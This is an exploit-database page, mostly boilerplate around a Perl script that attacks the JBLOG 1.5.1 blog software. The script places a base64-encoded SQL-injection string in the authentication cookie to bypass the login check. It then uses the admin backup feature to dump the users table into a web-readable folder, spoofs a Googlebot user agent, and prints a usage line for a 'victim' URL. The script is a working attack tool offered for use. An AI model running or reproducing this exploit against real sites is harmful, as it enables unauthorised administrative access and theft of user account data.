0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JBLOG 1.5.1 Remote SQL Table Backup Exploit
[===========================================
JBLOG 1.5.1 Remote SQL Table Backup Exploit
===========================================
#!/usr/bin/perl
=about
VENDOR
JBLOG 1.5.1
(maybe earlier versions vulnerable too)
http://www.lisijie.org
AUTHOR
discovered & written by Ams
VULNERABILITY DESCRIPTION
Both 'index.php' and 'admin.php' includes file 'common.php' which checks
for user permission on line 81 via function 'check_user()'.
This function is defined in file 'include/func_user.php'.
There is another one function - 'get_cookie()' which gets cookie values.
So, in cookies we put our evil string and further actions should be clear.
Why we don't filter COOKIEs ?
EXPLOIT WORK
This exploit uses SQL-injection to create dump of users table.
Actually, we are possible to do all administrator actions.
REQUIREMENTS
1. You need to know prefix, by default it is 'jblog_'.
But there is no problem to find it out.
2. Rights to write to 'cache/' folder.
=cut
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use MIME::Base64;
use Getopt::Long;
Banner();
$| = 1;
my $expl_url;
my $prefix = 'jblog_';
my $proxy = '';
GetOptions(
'u=s' => \$expl_url,
'pre=s' => \$prefix,
'p=s' => \$proxy,
) or Usage();
my $spider = LWP::UserAgent->new;
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
$spider->default_header( 'Cookie' => $prefix . 'authkey=' . encode_base64( "1\t' OR 1=1 -- " ) );
$spider->proxy(['http'], "http://$proxy/") if $proxy ne '';
$spider->timeout( 30 );
Exploit( $expl_url);
sub Exploit {
$_ = shift || Usage();
print "\n\tExploiting:\t $_";
my ($prot , $host, $path, )
= m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
$prot ||= 'http';
my $url = "$prot://$host$path";
my $defact = 'admin.php?ac=data&do=bakout&dosubmit=yes&sizelimit=2048';
# First request to prepare
my $req = GET "$url/$defact&baktables%5B%5D=${prefix}user";
my $res = $spider->request( $req );
my ($dir, $file) = $res->content =~ /yes&bakdir=(.*?)&(?:.*?)&filepre=(.*?)'/;
# Second request to dump table
$req = GET "$url/$defact&bakdir=$dir&step=1&baktablestr=${prefix}user&tableid=0&start=0&filepre=$file";
$res = $spider->request( $req );
# Finally checking if sql backup exists
$req = HEAD "$url/cache/backup/$dir/${file}_1.sql";
$res = $spider->request( $req );
if ( $res->is_success ) {
print "\n\tLooks ok, check $prot://$host${path}cache/backup/$dir/${file}_1.sql\n";
} else {
printf(
"\n\tFailure, server response: %s\n\tAnyway, check: %s\n",
$res->status_line, "$prot://$host${path}cache/backup/$dir/${file}_1.sql");
}
}
sub Usage {
print <<USAGE;
Usage:
-u Set url of victim
optional:
-pre Prefix, default 'jblog_' is used if no one mentioned
-p Proxy, set as ip:port
Example:
$0 -u=http://site.com -pre=jblog_ -p=127.0.0.1:8080
USAGE
exit;
}
sub Banner {
print <<BANNER;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
JBLOG 1.5.1 Perl exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BANNER
}
# 0day.today [2024-11-16] #